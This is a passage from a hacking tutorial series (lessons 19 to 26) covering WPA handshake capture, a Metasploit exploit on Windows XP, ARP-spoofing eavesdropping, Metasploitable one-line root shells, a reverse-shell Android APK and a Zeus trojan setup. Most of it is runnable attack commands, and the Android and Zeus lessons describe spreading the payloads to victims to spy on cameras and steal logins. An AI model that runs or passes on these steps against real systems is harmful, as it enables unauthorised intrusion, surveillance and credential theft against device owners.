1. As in the pic above, you saw the first line read "Switching wlan0 to channel 6".
(Yours will be mon0 instead of wlan0). Sometimes, it keeps switching
interfaces forever.
2. Sometimes it never gets a beacon frame, and gets stuck in the waiting for
beacon frame stage.
3. Sometimes it never associates with the target AP.
4. Sometimes the response is too slow, or never comes, and a (0x02) or something
error is displayed.
In most cases, such errors suggest1. Something wrong with wireless card.
2. AP is very choosy, won't let you associate.
3. The AP does not use WPS.
4. You are very far from the AP.
Possible workarounds1. Sometimes, killing naughty processes helps. (see pictures below)
2. Move closer to target AP
3. Do a fakeauth using aireplay-ng (Check speeding up WEP hacking) and tell
Reaver not to bother as we are already associated using -A (just add -A at the
end of your normal reaver code)
4. If you are using Kali Linux in Vmware, try booting into Kali using USB. I don't
know why, but sometimes internal adapters work wonders, and can't be used
from inside of a VM. In my case, booting up from USB and using internal
adapter increased the signal strength and speeded up the bruteforce
process. Update : It has nothing to do with internal adapter. I have verified
my observation with various hackers, and it is now a known problem with
Reaver. It does not work well inside Virtual machines. It is recommended
that you do a live boot.
processes causing problems
Kill 'em all
Lesson 19: Hack WPA-2 PSK Capture Handshake
Hack WPA-2 PSK Capturing the Handshake
WPA password hacking
Okay, so hacking WPA-2 PSK involves 2 main steps1. Getting a handshake (it contains the hash of password, i.e. encrypted password)
2. Cracking the hash.
Now the first step is conceptually easy. What you need is you, the attacker, a client
who'll connect to the wireless network, and the wireless access point. What happens is
when the client and access point communicate in order to authenticate the client, they
have a 4 way handshake that we can capture. This handshake has the hash of the
password. Now there's no direct way of getting the password out of the hash, and thus
hashing is a robust protection method. But there is one thing we can do. We can take
all possible passwords that can exists, and convert them to hash. Then we'll match the
hash we created with the one that's there in the handshake. Now if the hashes match,
we know what plain text password gave rise to the hash, thus we know the password.
If the process sounds really time consuming to you, then its because it is. WPA
hacking (and hash cracking in general) is pretty resource intensive and time taking
process. Now there are various different ways cracking of WPA can be done. But
since WPA is a long shot, we shall first look at the process of capturing a handshake.
We will also see what problems one can face during the process (I'll face the problems
for you). Also, before that, some optional wikipedia theory on what a 4-way
handshake really is (you don't want to become a script kiddie do you?)
The Four-Way Handshake
The authentication process leaves two considerations: the access point (AP) still needs
to authenticate itself to the client station (STA), and keys to encrypt the traffic need to
be derived. The earlier EAP exchange or WPA2-PSK has provided the shared secret
key PMK (Pairwise Master Key). This key is, however, designed to last the entire
session and should be exposed as little as possible. Therefore the four-way handshake
is used to establish another key called the PTK (Pairwise Transient Key). The PTK is
generated by concatenating the following attributes: PMK, AP nonce (ANonce), STA
nonce (SNonce), AP MAC address, and STA MAC address. The product is then put
through PBKDF2-SHA1 as the cryptographic hash function.
The handshake also yields the GTK (Group Temporal Key), used to decrypt multicast
and broadcast traffic. The actual messages exchanged during the handshake are
depicted in the figure and explained below:
1. The AP sends a nonce-value to the STA (ANonce). The client now has all the
attributes to construct the PTK.
2. The STA sends its own nonce-value (SNonce) to the AP together with a MIC,
including authentication, which is really a Message Authentication and
Integrity Code: (MAIC).
3. The AP sends the GTK and a sequence number together with another MIC.
This sequence number will be used in the next multicast or broadcast frame, so
that the receiving STA can perform basic replay detection.
4. The STA sends a confirmation to the AP.
All the above messages are sent as EAPOL-Key frames.
As soon as the PTK is obtained it is divided into five separate keys:
PTK (Pairwise Transient Key – 64 bytes)
1. 16 bytes of EAPOL-Key Confirmation Key (KCK)– Used to compute MIC on
WPA EAPOL Key message
2. 16 bytes of EAPOL-Key Encryption Key (KEK) - AP uses this key to encrypt
additional data sent (in the 'Key Data' field) to the client (for example, the RSN
IE or the GTK)
3. 16 bytes of Temporal Key (TK) – Used to encrypt/decrypt Unicast data packets
4. 8 bytes of Michael MIC Authenticator Tx Key – Used to compute MIC on
unicast data packets transmitted by the AP
5. 8 bytes of Michael MIC Authenticator Rx Key – Used to compute MIC on
unicast data packets transmitted by the station
The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used
if the network is using TKIP to encrypt the data.
By the way, if you didn't understand much of it then don't worry. There's a reason
why people don't search for hacking tutorials on Wikipedia (half the stuff goes above
the head)
Capturing The Handshake
Now there are several (only 2 listed here) ways of capturing the handshake. We'll look
at them one by one1. Wifite (easy and automatic)
2. Airodump-ng (easy but not automatic, you manually have to do what wifite did
on its own)
Wifite
Methodology
We'll go with the easy one first. Now you need to realize that for a handshake to be
captured, there needs to be a handshake. Now there are 2 options, you could either sit
there and wait till a new client shows up and connects to the WPA network, or you
can force the already connected clients to disconnect, and when they connect back,
you capture their handshake. Now while other tutorials don't mention this, I will (such
a good guy I am :) ). Your network card is good at receiving packets, but not as good
in creating them. Now if your clients are very far from you, your deauth requests (i.e.
please get off this connection request) won't reach them, and you'll keep wondering
why you aren't getting any handshake (the same kind of problem is faced during ARP
injection and other kind of attacks too). So, the idea is to be as close to the access
point (router) and the clients as possible. Now the methodology is same for wifite and
airodump-ng method, but wifite does all this crap for you, and in case of airodumpng, you'll have to call a brethren (airreply-ng) to your rescue. Okay enough theory.
Get the handshake with wifite
Now my configuration here is quite simple. I have my cellphone creating a wireless
network named 'me' protected with wpa-2. Now currently no one is connected to the
network. Lets try and see what wifite can do.
root@kali:~# wifite
.;'
`;,
.;' ,;'
`;, `;, WiFite v2 (r85)
.;' ,;' ,;'
`;, `;, `;,
:: :: : ( ) : :: :: automated wireless auditor
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':.
':.
/___\
/_____\
/
,:' ,:' designed for Linux
,:'
\
[+] scanning for wireless devices...
[+] enabling monitor mode on wlan0... done
[+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
[0:00:04] scanning wireless networks. 0 targets and 0 clients found
[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
NUM ESSID
CH ENCR POWER WPS? CLIENT
--- -------------------- -- ---- ----- ---- -----1 me
2 *******
1 WPA2 57db wps
11 WEP 21db
3 ************** 11 WEP 21db
no client
no
Now as you can see, my network showed up as 'me'. I pressed ctrl+c and wifite asked
me which target to attack (the network has wps enabled. This is an added bonus,
reaver can save you from all the trouble. Also, wifite will use reaver too to skip the
whole WPA cracking process and use a WPS flaw instead., in this tutorial we'll forget
that this network has WPS and capture the handshake instead)
[+] select target numbers (1-3) separated by commas, or 'all':
Now I selected the first target, i.e. me. As expected, it had two attacks in store for us.
First it tried the PIN guessing attack. It has almost 100% success rate, and would have
given us the password had I waited for 2-3 hours. But I pressed ctrl+c and it tried to
capture the handshake. I waited for 10-20 secs, and then pressd ctrl+c. No client was
there so no handshake could be captured. Here's what happened.
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:24] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on "me"
[0:08:05] listening for handshake...
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] disabling monitor mode on mon0... done
[+] quitting
Now I connected my other PC to 'me'. Lets do it again. This time a client will show
up, and wifite will de-authenticate it, and it'll try to connect again. Lets see what
happens this time around.
NUM ESSID
CH ENCR POWER WPS? CLIENT
--- -------------------- -- ---- ----- ---- -----1 *
1 WPA 99db
no client
2 me 1 WPA2 47db wps client
3 *
11 WEP 22db
4 * 11 WEP 20db
no clients
no
[+] select target numbers (1-4) separated by commas, or 'all': 2
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:07] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on "me"
[0:07:51] listening for handshake...
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] quitting
Now the deauth attacks weren't working. This time I increased the deauth frequency.
root@kali:~# wifite -wpadt 1
Soon, however, I realized, that the problem was that I was using my internal card
(Kali Live USB). It does not support packet injection, so deauth wasn't working. So
time to bring my external card to the scene.
root@kali:~# wifite
.;'
`;,
.;' ,;'
`;, `;, WiFite v2 (r85)
.;' ,;' ,;'
`;, `;, `;,
:: :: : ( ) : :: :: automated wireless auditor
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':.
/___\
':.
/_____\
/
,:' ,:' designed for Linux
,:'
\
[+] scanning for wireless devices...
[+] available wireless devices:
1. wlan1
Ralink RT2870/3070
2. wlan0
Atheros
rt2800usb - [phy1]
ath9k - [phy0]
[+] select number of device to put into monitor mode (1-2):
See, we can use the USB card now. This will solve the problems for us.
Now look at wifite output
NUM ESSID
CH ENCR POWER WPS? CLIENT
--- -------------------- -- ---- ----- ---- -----1 me
2 *
1 WPA2 44db wps client
11 WEP 16db
3 *
no client
11 WEP 16db
no
[+] select target numbers (1-3) separated by commas, or 'all':
Now I attack the target. This time, finally, I captured a handshake.
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:01] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on "me"
[0:07:23] listening for handshake...
[0:00:57] handshake captured! saved as "hs/me_02-73-8D-**-**-**.cap"
[+] 2 attacks completed:
[+] 1/2 WPA attacks succeeded
me (02:73:8D:37:A7:ED) handshake captured
saved as hs/me_02-73-8D-**-**-**.cap
[+] starting WPA cracker on 1 handshake
[!] no WPA dictionary found! use -dict <file> command-line argument
[+] disabling monitor mode on mon0... done
[+] quitting
As you can see, it took me 57 seconds to capture the handshake (5 deauth requests
were sent, one every 10 secs is defualt). The no dictionary error shouldn't bother you.
We'll use Wifite only to capture the handshake. Now the captured handshake was
saved as a .cap file which can be cracked using aircrack, pyrit, hashcat (after
converting .hccap), etc. using either a wordlist or bruteforce. Let's see how to do the
same thing with airodump-ng. This time I won't show you the problems you might run
into. It'll be a perfect ride, all the problems were seen in wifite case.
Capturing Handshake with Airodump-ng
Now if you skipped everything and got right here, then you are missing a lot of things.
I'll end this pretty quick, as the wifite thing was quite detailed. I'm copying stuff
from http://www.kalitutorials.net/2013/08/wifi-hacking-wep.html where I already
discussed airodump-ng. (If you are not a newbie, skip to the point where you see red
text)
1. Find out the name of your wireless adapter.
Alright, now, your computer has many network adapters, so
to scan one, you need to know its name. So there are
basically the following things that you need to know


lo - loopback. Not important currently.
eth - ethernet
wlan - This is what we want. Note the suffix associated.
Now, to see all the adapters, type ifconfig on a
terminal. See the result. Note down the wlan(0/1/2)
adapter.
Trouble with the wlan interface not showing up. This is
because virtual machines can't use internal wireless
cards and you will have to use external cards. You
should try booting Kali using Live USB (just look at the
first part of this tutorial), or buy an external card.
2. Enable Monitor mode
Now, we use a tool called airmon-ng to
interface called mon. Just type
airmon-ng start wlan0
Your mon0 interface will be created.
create a virtual
3. Start capturing packets
Now, we'll use airodump-ng to capture the packets in the
air. This tool gathers data from the wireless packets in
the air. You'll see the name of the wifi you want to
hack.
airodump-ng mon0
4. Store the captured packets in a file
This can be achieved by giving some more parameters with
the airodump command
airodump-ng mon0 --write name_of_file
Non newbiesroot@kali:~# airmon-ng start wlan1
root@kali:~# airodump-ng mon0 -w anynamehere
Now copy the bssid field of your target network (from airodump-ng ng screen)and
launch a deauth attack with aireplay-ng
root@kali:~# aireplay-ng --deauth 0 -a BSSID here mon0
The --deauth tells aireplay to launch a deauth attack. 0 tell it to fire it at interval of 0
secs (very fast so run it only for a few secs and press ctrl+c). -a will required BSSID
and replace BSSID here with your target BSSID. mon0 is the interface you created.
In case you face problems with the monitor mode hopping from one channel to
another, or problem with beacon frame, then fix mon0 on a channel usingroot@kali:~# airodump-ng mon0 -w anynamehere -c 1
Replace 1 with the channel where your target AP is. You might also need to add -ignore-negative-one if aireplay demands it. In my case airodump-ng says fixed
channel mon0: -1 so this was required. (It's a bug with aircrack-ng suite).
Now when you look at the airodump-ng screen, you'll see that at the top right it says
WPA handshake captured . Here is what it looks like
CH 1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: **
BSSID
PWR RXQ Beacons
02:73:8D:37:A7:ED -47 75
201
#Data, #/s CH MB ENC CIPHER AUTH ESSID
35
0 1 54e WPA2
CCMP PSK me
BSSID
STATION
PWR Rate
*
*
0
*
*
-35 0e- 1
0e- 1
Lost
742
Frames Probe
82 me
0 26
You can confirm it by typing the following
root@kali:~# aircrack-ng anynamehere-01.cap
Opening anynamehere-01.cap
Read 212 packets.
# BSSID
ESSID
1 ************** me
2 **
Encryption
WPA (1 handshake)
Unknown
Happy cracking, all that needs to be done in this tutorial has been done. Its been a
long one. Hope it helped you.
Lesson 20: Hacking Windows XP
Penetration Testing - Hacking XP
Our approach to penetration
testing is going to be simple. I already made a post about the ideal way to begin
penetration testing. But we aren't going to ideal way. I'm gonna teach you penetration
testing the way I learnt it. By doing actual penetration and exploitation. We can't
hack completely patched Windows 7 or Windows 8 right, but we can definitely hack
an unpatched Windows XP machine. However, to do that, you need to victim
machine. Testing this method on someone else's computer is not recommended and is
quite illegal. It is strongly advised to create your own virtual machine and test exploits
there.
Virtual Machines


Windows XP , installing XP on a VM will be a piece of cake, a few screenshots of the
process)
A look at Metasploit Framework
Starting the framework
"In keeping with the Kali Linux Network Services Policy, there are no network
services, including database services, running on boot so there are a couple of steps
that need to be taken in order to get Metasploit up and running with database support."
Simply speaking, there are some services that metasploit needs which aren't started
with system startup. So here's some commands you need to execute on your console
before you can start metasploit
service postgresql start
(Metasploit uses PostgreSQL as its database so it needs to be launched first.)
With PostgreSQL up and running, we next need to launch the metasploit service. The
first time the service is launched, it will create a msf3 database user and a database
called msf3. The service will also launch the Metasploit RPC and Web servers it
requires.
service metasploit start
Now finally we are ready to start metasploit framework.
msfconsole
Looking at the targets
Right now, my metasploit framework is running on Kali on Vmware on a Windows 8
machine. Also, there is a Windows XP Sp3 virtual machine running side my side with
my Kali. So what we need to do is detect these machines in Metasploit framework.
For this we'll do a port scan.
Port Scan
Metasploit offers an awesome port scanning function which goes by the name
auxiliary scanner. Here is the command to execute this scan
To use this feature, enter the following codeuse auxiliary/scanner/portscan/tcp
Type show options to see the available options
show options
Now we have to change a few settings, firstly, we should reduce the number of ports
scanned
set ports 1-500
Secondly, we have to specify a target IP to scan. Now this is a bit tricky, as the IP is
not going to be the same in all cases. So here's what you'll do. Go to your XP virtual
machine (the one you are trying to hack). Open command prompt and type
ipconfig
In the results, check the IP of the machine. This is what you'll have to specify the
RHOSTS option as.
In my case the IP is 192.168.63.131
Now go back to your Kali machine, and type the fol (change the IP as required)
set RHOST 192.168.63.131
Here's what it should look like
There's a slight error here, I spelled RHOSTS wrong. Make sure you add the 's' in the end.
Now we are ready for some action, do a show options again to see what all changes
you've made. Finally, typerun
The scan will start and after some time it will show you which tcp ports are open and
vulnerable to attack.
If you had not been using an unpatched version of Windows, there will not be any
vulnerable ports.
This basically means that there are no open ports here. Nothing much you can do.
However if you had some good luck there, and had a vulnerable machine, you will
have some vulnerable ports. In my case, I turned off the firewall on the windows
machine and run the auxiliary module again.
I got 3 open ports this time. If you are using some higher XP version, you too might
need to disable firewall in order to get open ports.
Now we know we have a target at IP 192.168.63.131 and it has port 135 139 and 445
open.
Real life port scan
In actual pentesting environment, you don't know about the IP, open ports and OS of
the target computer. In such cases, we can use Nmap port scanner which is much
better than auxiliary. We'll come to that later.
Finding Exploits
This step is important. We need to figure out which exploits work on the OS we are
attacking. In our case, we already know what to do. Type back to get out of auxiliary
scanner. Search for dcom on msfconsole.
search dcom
This is a very famous exploit for Windows.
Copy the exploit number 3. (Which shows great as rank). In the next line, type
use exploit/windows/dcerpc/ms03_026_dcom
You are now using the most famous Windows exploit. Type show options again
show options
Again, set the RHOST as 192.168.63.131 (replace with the IP of your target)
set RHOST 192.168.63.131
Also, set a payload.
set PAYLOAD windows/shell_bind_tcp
And here's the best part
exploit
You have now successfully broken into the target computer. You have an open shell
on the target computer with administrator privileges. In short, you own that computer
now. Try out what all you can do from here on. I'll come up with more in the next
tutorial.
We have a pentesting lab now and have successfully exploited an XP machine.
Lesson 21: Metasploitable 2
Metasploitable 2 Linux - Most Vulnerable OS in
the town : Introduction and Installation
What is Metasploitable 2
The Metasploitable virtual machine is an
intentionally vulnerable version of Ubuntu Linux designed for testing security tools
and demonstrating common vulnerabilities. Version 2 of this virtual machine is
available for download and ships with even more vulnerabilities than the original
image. This virtual machine is compatible with VMWare, VirtualBox, and other
common virtualization platforms. By default, Metasploitable's network interfaces are
bound to the NAT and Host-only network adapters, and the image should never be
exposed to a hostile network. [Quoted from Rapid7]
Download and install metasploitable linux
Firstly, I'd list some requirements- 10 to 30 GB disk space for metasploitable (Kali
would need a similar amount of disk space), 1GB ram for metasploitable (a total of
4GB would be great, 1gb for kali, 1gb for metasploit, and 2gb will keep your host OS
running). If you have all this, which you probably should, then go ahead and
download Metasploitable from sourceforge.
- http://sourceforge.net/projects/metasploitable/
The last time I checked, the download was a zip file.
After extracting it, no installation is needed. What IS needed is a virtual machine
software like Vmware or virtualbox. You can use Virtual Box, which is free, or
VmWare workstation, which you'll have to buy, Vmware player is free, and will serve
most of your purposes. I am using Vmware Workstation, and will give the instructions
for it. Detailed guides are available for all of these on the internet, and I won't waste
much time with it. Assuming you have downloaded and extracted the Metasploitable
file, and installed Vmware Workstation, follow these instruction-
Open Vmware workstation. Click on file -> Open. Something like this will pop out.
After that browse to the location where you extracted the Metasploitable file. It must
look somewhat like this. Click on open. You will see something with Vmware icon.
Open that one.
Your Virtual machine will be up and running within a few minutes. Depending on the
situation, a few more
next and enter stuff would be required, but the instructions provided by the program
would be simple and clear and you can help yourself.
Once you've started Metasploitable
You'll have a login prompt, and the login username and password would be given
right there. It would be msfadmin, if you can't seem to find it. Nothing else needs to
be done here. Now your target is ready, but you are far from done. If this is not your
visit to this blog, then you have probably already installed Kali Linux and know how
to use it. If you have been following this blog for a long time, then you also know how
to use Metasploit to hack Windows machine, and are ready to jump to the next post.
So if you have to OS, and the basic hacking skills, then you can stop here and move to
the next post (coming soon). If not, follow along.
Kali Linux and metasploit
While its not necessary to use Kali Linux, and Backtrack, Backbox Linux and other
Linux distributions will work well too, there is no reason why NOT to use Kali Linux.
It simplifies everything for you, providing you with 100s of tools pre-installed, and is
specifically designed for pentesting. It has some advantages over Backtrack, most
importantly, it has been written from scratch in Debian and has resolved most of the
backtrack issues. It comes preinstalled with Metasploit, so it takes down one step.
Lesson 22: Man In The Middle Attack
Today our tutorial will talk about Kali Linux Man in the Middle Attack. How to perform man in the
middle attack using Kali Linux. We will learn the step by step process how to do this.
I believe most of you already know and learn about the concept what is man in the middle attack, but
if you still don't know about this, here is some definition from wikipedia.
The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography
and computer security is a form of active eavesdropping in which the attacker makes independent
connections with the victims and relays messages between them, making them believe that they are
talking directly to each other over a private connection, when in fact the entire conversation is
controlled by the attacker.
Victim IP address : 192.168.8.90
Attacker network interface : eth0; with IP address : 192.168.8.93
Router IP address : 192.168.8.8
Requirements:
1. Arpspoof
2. Driftnet
3. Urlsnarf
Step by step Kali Linux Man in the Middle Attack :
1. Open your terminal (CTRL + ALT + T kali shortcut) and configure our Kali Linux machine to allow
packet forwarding, because act as man in the middle attacker, Kali Linux must act as router between
"real router" and the victim. Read the tutorial here how to set up packet forwarding in linux.
2. You can change your terminal interface to make the view much more friendly and easy to monitor
by splitting kali linux terminal window.
3. The next step is setting up arpspoof between victim and router.
arpspoof -i eth0 -t 192.168.8.90 192.168.8.8
4. And then setting up arpspoof from to capture all packet from router to victim.
arpspoof -i eth0 192.168.8.8 192.168.8.90
5. After step three and four, now all the packet sent or received by victim should be going through
attacker machine.
6. Now we can try to use driftnet to monitor all victim image traffic. According to its website,
Driftnet is a program which listens to network traffic and picks out images from TCP streams it
observes. Fun to run on a host which sees lots of web traffic.
7. To run driftnet, we just run this
driftnet -i eth0
When the victim browses a website with image, driftnet will capture all image traffic.
To stop driftnet, just close the driftnet window or press CTRL + C in the terminal
8. For the next step we will try to capture the website information/data by using urlsnarf. To use
urlsnarf, just run this code
urlsnarf -i eth0
and urlsnarf will start capturing all website address visited by victim machine.
9. When the victim browses a website, attacker will know the address victim visited.
Lesson 23: Metasploitable 2 – Vulnerability
Assessment.
Metasploitable 2 : Vulnerability assessment and
Remote Login
If you've followed my previous tutorial on Introduction to Metasploitable 2, then you
should be sitting here with Kali Linux and Metasploitable 2 up and running. So, I'm
gonna skip the formalities and move right ahead.
Portscan
On a Kali Linux machine, open a terminal. Type ifconfig, and note the eth0 IP
address. This will give you an idea of what the ip of your target machine could be. In
my case, ifconfig returned my IPv4 address as 192.168.154.131. This means that
Metasploitable must have an IP residing somewhere in the 192.168.154.xxx range. To
scan all ports in that range, you can use Nmap scan. Here is what it should look like.
nmap -sS 192.168.154.0/24
The conclusion that can be drawn here is that the Metasploitable 2 machine has IP
192.168.154.132. Also, it has a huge lot of open ports. As you will discover later, each
of these ports is a potential gateway into the machine. On the metasploitable machine,
after logging in with msfadmin:msfadmin, you can execute an ifconfig to verify that
the IP is indeed 192.168.154.132 (or whatever may be your case).
Vulnerabilities
Now the Metasploitable 2 operating system has been loaded with a large number of
vulnerabilites. There are the following kinds of vulnerabilities in Metasploitable 21. Misconfigured Services - A lot of services have been misconfigured and
provide direct entry into the operating system.
2. Backdoors - A few programs and services have been backdoored. These
backdoors can be used to gain access to the OS.
3. Weak Passwords - These are vulnerable to bruteforce attacks.
4. Vulnerable Web Services- A few web services pre-installed into
Metasploitable have known vulnerabilities which can be exploited.
5. Web Application Vulnerabilities - Some vulnerable web applications can be
exploited to gain entry to the system.
There is a very resourceful article about many vulnerabilities on Rapid7 website.
Exploiting The Vulnerabilities
Remote access vulnerability - Rlogin
Remember the list of open ports which you came up across during the port scan? The
512,513 and 514 ports are there for remotely accessing Unix machines. They have
been misconfigured in such a way that anyone can set up a remote connection without
proper authentication. This vulnerability is easy to exploit. We will use rlogin to
remotely login to Metasploitable 2. Type rlogin to see the details about the command
structure.
root@kali:~# rlogin
usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec]
[-D [bind_address:]port] [-e escape_char] [-F configfile]
[-I pkcs11] [-i identity_file]
[-L [bind_address:]port:host:hostport]
[-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
[-R [bind_address:]port:host:hostport] [-S ctl_path]
[-W host:port] [-w local_tun[:remote_tun]]
[user@]hostname [command]
rlogin -l root 192.168.154.132
Most probably you will get something like this-
root@kali:~# rlogin -l root 192.168.154.132
The authenticity of host '192.168.154.132 (192.168.154.132)' can't be established.
RSA key fingerprint is *****.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.154.132' (RSA) to the list of known hosts.
[email protected]'s password:
As you can see, it is asking for a password. It's not because the target is not
vulnerable. It's because we don't have ssh-client installed on Kali Linux. The rshclient is a remote login utility that it will allow users to connect to remote machines.
apt-get install rsh-client
This will start the installation progress, you'll have to type yes once or twice, Kali will
do the rest for you. After the installation is successful, you should try your previous
command again. This time around, things will be better.
root@kali:~# rlogin -l root 192.168.154.132
Last login: Thu May 1 11:34:55 EDT 2014 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~#
Now you have an administrator privilege shell on Metasploitable 2. That was as easy
as typing one line. (and installing an application). We have one more such
vulnerability that can be exploited easily.
Telnet Vulnerability
Look at the open port list again. On port 21, Metasploitable 2 runs VSFTPD, a
popular FTP server. The version that is installed on Metasploit contains a backdoor.
The backdoor was quickly identified and removed, but not before quite a few people
downloaded it. If a username is sent that ends in the sequence ":)" (the happy smiley),
the backdoored version will open a listening shell on port 6200. This means anyone
can login to a computer without knowing the credentials, just use :). This can be
exploited using Metasploit. We will cover this in the next tutorial. Till then something
for your appetitetelnet 192.168.99.131 1524
This is a another one line exploit, on the 1524 ingreslock port (see portscan result).
Lesson 24: Hacking Android
Nowadays mobile users are increasing day by day, the security threat is also increasing together
with the growth of its users. Our tutorial for today is how to Hack Android Smartphones using
Metasploit.
Android is an operating system based on the Linux kernel, and designed primarily for touchscreen
mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc.,
which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with
the founding of the Open Handset Alliance: a consortium of hardware, software, and
telecommunication companies devoted to advancing open standards for mobile devices.What is
android? according to wikipedia:
and what is APK? according to wikipedia:
Android application package file (APK) is the file format used to distribute and install application
software and middleware onto Google's Android operating system; very similar to an MSI package in
Windows or a Deb package in Debian-based operating systems like Ubuntu.
Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)
Step by Step Hacking Android Smartphone Tutorial using Metasploit:
1. Open terminal
2. We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp
LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
As described above that attacker IP address is 192.168.8.94 now execute the command.
3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker
machine, attacker needs to set up the handler to handle incoming connections to the port already
specified above. Type msfconsole to go to Metasploit console.
Info:
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is
the same with step 2
4. The next step we need to configure the switch for the Metasploit payload we already specified in
step 3.
Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how
to distribute this file, internet is the good place for distribution ).
6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim
open the application, the meterpreter session will open and the attack has begun.
7. this means that attacker already inside the victim android smartphone and he can do everything
with victim phone.
Experiment with different commands at this point, for example
webcam_list gives you a list of the camera's on the victims device
such as:
back camera
front camera
webcam_snap 2 Would take a picture from one of the cameras
sneaky sneaky.
Conclusion:
1. Don't install APK's from the unknown source.
2. If you really want to install APK's from unknown source, make sure you can view, read and
examine the source code.
Lesson 25: Remote Administration Tool (RAT)
Today we will learn how to set up Remote Administration Tool Zeus BotNet (RAT). We choose Zeus
because Zeus was one of the famous trojan horse viruses in history that infected many servers
around 2007-2010.
If you don't know about Zeus, here is the definition from Wikipedia:
Zeus is a Trojan horse that steals banking information by Man-in-the-browser keystroke logging and
Form Grabbing. Zeus is spread mainly through drive-by downloads and phishing schemes. First
identified in July 2007 when it was used to steal information from the United States Department of
Transportation, it became more widespread in March 2009. In June 2009, security company Prevx
discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies
as the Bank of America, NASA, Monster.com, ABC, Oracle, Play.com, Cisco, Amazon, and
BusinessWeek.
In late 2010, a number of Internet security vendors including McAfee and Internet Identity claimed
that the creator of Zeus had said that he was retiring and had given the source code and rights to
sell Zeus to his biggest competitor, the creator of the SpyEye trojan. However, those same experts
warned the retirement was a ruse and expect the cracker to return with new tricks. As of 13 May
2011, the source code and compiled binaries are found to be hosted on GitHub.
Requirements:
1. Remote Administration Tool (RAT) Zeus BotNet
2. Web Server + Database Server (in this example we use XAMPP)
Remote Administration Tool(RAT) Zeus BotNet:
1. Firstly, we need to install the web server and database server. Since we're using XAMPP for this
tutorial, you can refer to previous step by step How to Install XAMPP in 7 Simple Steps to install
XAMPP on Windows machine and make sure your XAMPP apache and MySQL service was started
and running.
2. Open the internet browser and type http://localhost/phpmyadmin. Input the username and
password, by default the username is root and password leave it empty. After that create a new
database, I named it bot, but you can change it into whatever you want. This database name will be
used for the installation of remote administration tool.
3. The next step we need to download the remote administration tool file and extract it, you will find 3
main folders, builder, other, and server[php]. Create a new folder inside C:\xampp\htdocs. I
give the folder name as bot, then copy the server [php] contents into C:\xampp\htdocs\bot.
4. Now back again into our web browser and type http://localhost/bot/install into the
address bar. Input all required field with the correct information.
Information:
– The host address for MySQL filled with your database server IP address. If you run XAMPP it
should be your IP address.
– Database is filled with information about our database name that already created in step 2.
– Encryption key you can fill with any characters with length from 1 – 255
click Install to start installing.
Notes: If you get this error
ERROR:Failed connect to MySQL server: Host 'myusername' is not allowed to connect to this
MySQL server
You need to do the following step by step
a. Open your PHPMyAdmin http://localhost/phpmyadmin and click the Privileges tab.
Click edit button to edit the root user privileges.
b. In the edit user page, scroll down and find the login information section. Change the Host
from localhost to Any host and press Go button.
6. The next step is configuring and create the zeus bot client. Open the builder folder and
open config.txt configuration file. Change
the url_config, url_loader and url_server configuration according to your settings for your
IP address.
Note: don't forget to edit the path of webinjects.txt.
7. Now for the next step, open the zsb.exe file. .
Click builder, then click browse, Click build the bot configuration under the actions header, then build
the bot executable.
8. After all the build bot config and bot executable on step 7, now we have the new
file config.bin and bot.exe. Copy those two file into the htdocs folder. Mine was
inside C:\xampp\htdocs\bot.
9. Now let's says we will send the generated bot.exe to the victim. After victim execute the file we
can check our attacker server. Open the browser and type http://localhost/bot/cp.php and
insert your username and password.
10. We can see the new infected victim in the web interface and even view the desktop screenshot
of the victim.
Conclusion:
1. When victim already infected, attacker can gather many information from the victim including all
internet activities and even gather all the website username and password since this tool can act as
a keylogger and capturing the log in information.
2. To prevent the attack of this trojan, always update your operating system and anti virus and do not
click any link that looks suspicious in your mail or chat messenger.
Lesson 26: Hacking Basic HTTP Authentication using
Burp Suite
Hacking http basic authentication dictionary attacks with burp suite free is our tutorial for today, we
will use a tool called BURP suite.
If you just hear about BURP suite, here is the explanation from their website:
